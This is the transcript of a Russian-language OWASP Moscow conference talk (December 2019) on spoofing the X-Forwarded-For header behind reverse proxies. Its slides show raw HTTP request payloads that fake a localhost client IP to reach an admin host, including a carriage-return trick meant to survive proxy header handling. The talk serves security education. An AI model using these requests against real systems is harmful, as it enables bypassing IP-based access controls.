«Свой среди чужих», Антон Лопаницын

«Свой среди чужих», Антон Лопаницын

Видео https://www.youtube.com/watch?v=JC8hwr9ILQw

Встреча Московского отделения OWASP, 6.12.2019 (https://www.meetup.com/OWASP-Moscow/events/266925142/)

47a3212bc9721c62f1135ead56569f17?s=128

OWASP Moscow

December 06, 2019
Tweet

Transcript

  1. Свой среди чужих Чужие среди своих

  2. Reverse Proxy

  3. None
  4. X-Forwarded-For: <client>, <proxy> X-Forwarded-For: <fake>, <client>, <proxy>

  5. HTTP-request GET / HTTP/1.1
 Host: admin.my.site
 Connection: close GET /

    HTTP/1.1
 Host: admin.my.site
 X-Forwarded-For: 123.123.123.123, 192.168.1.1
 Connection: close X-Forwarded-For: <client>, <proxy>
  6. XFF/XRI Spoofing GET / HTTP/1.1
 Host: admin.my.site X-Forwarded-For: 127.0.0.1
 Connection:

    close GET / HTTP/1.1
 Host: admin.my.site
 X-Forwarded-For: 127.0.0.1, 123.123.123.123, 192.168.1.1
 Connection: close X-Forwarded-For: <fake>, <client>, <proxy>
  7. HTTP-request GET / HTTP/1.1\r\n
 Host: admin.my.site\r\n
 X-Forwarded-For: 127.0.0.1\r\n
 Connection: close\r\n

    \r\n X-Forwarded-For: <fake>, <client>, <proxy>
  8. HTTP-request with 0d GET / HTTP/1.1\r\n
 Host: admin.my.site\r\n
 X-Forwarded-For: 127.0.0.1\r\r\n


    Connection: close\r\n \r\n X-Forwarded-For: <fake>\r, <client>, <proxy>
  9. XFF/XRI Spoofing+ GET / HTTP/1.1\r\n
 Host: admin.my.site\r\n
 X-Forwarded-For: 127.0.0.1\r\r\n
 Connection:

    close\r\n \r\n GET / HTTP/1.1
 Host: admin.my.site
 X-Forwarded-For: 127.0.0.1 , 123.123.123.123, 192.168.1.1
 Connection: close X-Forwarded-For: <fake> , <client>, <proxy> Tomcat? WebSphere?
  10. Twi: @i_bo0om Site: bo0om.ru Telegram: @webpwn